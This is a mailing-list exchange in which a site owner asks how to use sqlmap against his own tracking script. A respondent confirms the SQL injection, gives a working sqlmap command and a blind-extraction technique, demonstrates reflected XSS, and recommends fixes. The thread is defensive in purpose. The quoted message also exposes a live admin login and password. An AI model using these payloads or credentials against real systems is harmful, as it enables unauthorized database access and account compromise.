Hi Guy
This is indeed a valid vulnerability.
If we take the following request:
POST /trk/lpg/index.php HTTP/1.1
Host: myimg.co
Cookie: PHPSESSID=yourID
from_date=2013-05-21&to_date=2013-05-23&campaign_id=11'5*CA-PTV*Keyword*********&crap=&submit=submit&stage=2
Then we receive a response which includes the following:
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '\'5
AND clicks.ViewDate > '2013-05-21'
AND clicks.View' at line 10
Notice the apostrophe included in the campaign_id. This breaks the SQL
syntax and proves that we have error based SQL injection. You should not
output DBMS error messages to the client, although simply disabling this
will not remove the issue, because there are other, blind, techniques that
we can use (e.g. time based etc.) The above does prove the concept, the
issue is there.
In terms of making it work with SQLMap, the following should work:
1) Save the entire HTTP request into a file, for the purposes of this
demonstration I've saved it to a file called REQUEST in the same directory
as SQLMap.
2) Edit the file so that campaign_id is just an integer, e.g. 115
3) Use the following command:
python sqlmap.py -r REQUEST -p campaign_id --suffix
"*CA-PTV*Keyword**********" -f -b
You can replace the -f and -b with whatever it is you're trying to get at,
e.g. --dbs to list the databases available to that DBMS user.
The problem you were having probably arose from the fact that the injection
point is mid value, so you needed to provide the rest of the expected value
to create "valid" requests.
To fix this issue, you need to be using prepared statements, so for PHP
see, for example: http://php.net/manual/en/pdo.prepare.php
Finally, as an aside, you also have (reflected) Cross Site Scripting
issues. If you insert script tags into the three primary POST values (i.e.
from_date, to_date and campaign_id) the page response doesn't encode the
output and so you can have a request such as:
from_date=2013-05-21<script>alert(123)</script>&to_date...
and the page will respond with:
<b>Date Range: </b> 2013-05-21<script>alert(123)</script> ---
2013-05-23<br>....etc.
Bearing all of the above in mind, your remediation priority should be:
1) Use prepared statements for all SQL queries in order to get rid of SQL
injection
2) Output encode all content returned to the client in a manner appropriate
for the context of that output (e.g. encoding for output that will end up
as normal HTML will differ from encoding output that appears in an existing
JS block). This will get rid of most XSS.
3) Stop outputting DBMS error messages to the client. It's fine to save
these to a file above the web root.
Well, that's my gratis work done for the year :)
Hope it helped.
Regards
Chris Oakley
On 23 May 2013 00:53, Guy Dufour <yamah...@gmail.com> wrote:
> My script is installed on http://myimg.co/trk/lpg/
> login " admin ", password " hello "
>
> A security advisor told me that it's injectable while being logged in
> manually by modifying the POST param "campaign_id"
>
> Example:
> Change " 129*US-LP-PPV*PPV********* " to :
> 129 and ascii(substring((SELECT database()),1,1))>108*p*ts'*********
>
> 109
>
>
> 129 and ascii(substring((SELECT database()),2,1))>120*p*ts'*********
>
> 121
>
>
> 129 and ascii(substring((SELECT database()),3,1))>104*p*ts'*********
>
> 105
>
>
> 129 and ascii(substring((SELECT database()),4,1))>108*p*ts'*********
>
> 109
>
>
> 129 and ascii(substring((SELECT database()),5,1))>102*p*ts'*********
>
> 103
>
> 129 and ascii(substring((SELECT database()),6,1))>98*p*ts'*********
>
> 99
>
> 129 and ascii(substring((SELECT database()),7,1))>110*p*ts'*********
>
> 111
>
> 129 and ascii(substring((SELECT database()),8,1))>94*p*ts'*********
>
> 95
>
> 129 and ascii(substring((SELECT database()),9,1))>98*p*ts'*********
>
> 99
>
> 129 and ascii(substring((SELECT database()),10,1))>111*p*ts'*********
>
> 112
>
>
> 129 and ascii(substring((SELECT database()),11,1))>117*p*ts'*********
>
> 118
>
>
> This gives database name = myimgco_cpv
>
>
> However I can't seem to be able to make this work in SQLmap..
>
> Do you guys have any idea? You can try to reproduce this on my server,
> without breaking anything please :)
>
>
> Thanks a lot!
>
>
>
> ------------------------------------------------------------------------------
> Try New Relic Now & We'll Send You this Cool Shirt
> New Relic is the only SaaS-based application performance monitoring service
> that delivers powerful full stack analytics. Optimize and monitor your
> browser, app, & servers with just a few lines of code. Try New Relic
> and get this awesome Nerd Life shirt! http://p.sf.net/sfu/newrelic_d2d_may
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
------------------------------------------------------------------------------
Try New Relic Now & We'll Send You this Cool Shirt
New Relic is the only SaaS-based application performance monitoring service
that delivers powerful full stack analytics. Optimize and monitor your
browser, app, & servers with just a few lines of code. Try New Relic
and get this awesome Nerd Life shirt! http://p.sf.net/sfu/newrelic_d2d_may
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
